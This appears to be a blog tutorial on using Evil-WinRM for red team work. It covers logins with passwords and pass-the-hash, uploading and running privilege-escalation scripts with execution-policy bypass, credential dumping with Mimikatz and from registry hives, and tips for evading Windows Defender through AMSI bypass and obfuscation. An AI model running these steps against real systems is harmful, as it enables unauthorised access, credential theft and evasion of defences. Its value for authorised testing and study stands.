Leave a Comment / Exploitation, Uncategorized / By

What Is Evil-WinRM?

Evil-WinRM (Evil Windows Remote Management) is a PowerShell Remoting shell that allows authenticated users to interact with a remote Windows machine over the WinRM protocol.

Think of it like a remote PowerShell shell on steroids — fast, reliable, and custom-built for red team operations.

When Should You Use Evil-WinRM?

Use Evil-WinRM when:

  • You have valid credentials (username + password or NTLM hash) on a Windows machine
  • The target has WinRM enabled (usually port 5985 HTTP or 5986 HTTPS)
  • You want a stable shell for:
    • Uploading and executing payloads/scripts
    • Running PowerShell commands
    • Doing post-exploitation like privilege escalation, dumping hashes, etc.

How to Install Evil-WinRM on Kali

Kali should already have it, but to install manually:

sudo gem install evil-winrm

Check it:

evil-winrm -h

Basic Usage

evil-winrm -i <IP> -u <user> -p <password>

Example:

evil-winrm -i 10.10.10.100 -u administrator -p 'Winter2024!'

You now have an interactive remote PowerShell shell.

Using NTLM Hash (Pass-the-Hash)

evil-winrm -i 10.10.10.100 -u administrator -H <NTLM_HASH>

Example:

evil-winrm -i 10.10.10.100 -u administrator -H aad3b435b51404eeaad3b435b51404ee:cc36cf7a8514893efccd332446158b1a

Pro Tip: Upload Files

In an Evil-WinRM session, upload your favorite scripts:

upload /path/to/LinPE.ps1

Then run it:

powershell -ep bypass
. .\LinPE.ps1
Invoke-LinPE

Or use built-in aliases:

upload winPEASx64.exe

Enumerating the Target

You can run classic recon commands right away:

whoami
hostname
ipconfig /all
systeminfo

Or load enumeration scripts:

upload PowerUp.ps1
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks

Post-Exploitation Ideas

Once you’ve got Evil-WinRM access, here’s what you can do:

  • Run Mimikatz to dump credentials (if AV doesn’t block)
  • Grab SAM/SECURITY/SYSTEM hives if SYSTEM
  • Enumerate tokens and privileges
  • Check for AlwaysInstallElevated, unquoted paths, or registry misconfigs
  • Dump LSA secrets, look for hardcoded creds
  • Use Sharp tools (upload .exe or .dll)

Using Custom Scripts & Modules

You can load modules dynamically:

upload PrivescCheck.ps1
powershell -ep bypass
. .\PrivescCheck.ps1
Invoke-PrivescAudit

You can also invoke PowerView or BloodHound collectors for AD enumeration.

Bypassing Defender

If your scripts are getting blocked:

  • Use base64 encoding
  • Try DLL sideloading
  • Use AMSIBYPASS before invoking payloads
  • Or just upload evasion-modified versions of your scripts (like Invoke-Mimikatz with obfuscation)

Summary of Key Flags

OptionDescription
-iTarget IP address
-uUsername
-pPassword
-HNTLM hash
-sScript to execute
-cCommand to run
-eLoad external modules

Example Attack Flow

  1. Compromise creds (e.g. from SMB, SQL, Kerberoasting)
  2. Confirm WinRM is open: nc -nv 10.10.10.100 5985
  3. Use Evil-WinRM to log in: evil-winrm -i 10.10.10.100 -u user -p pass
  4. Enumerate, upload tools, escalate

Related Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top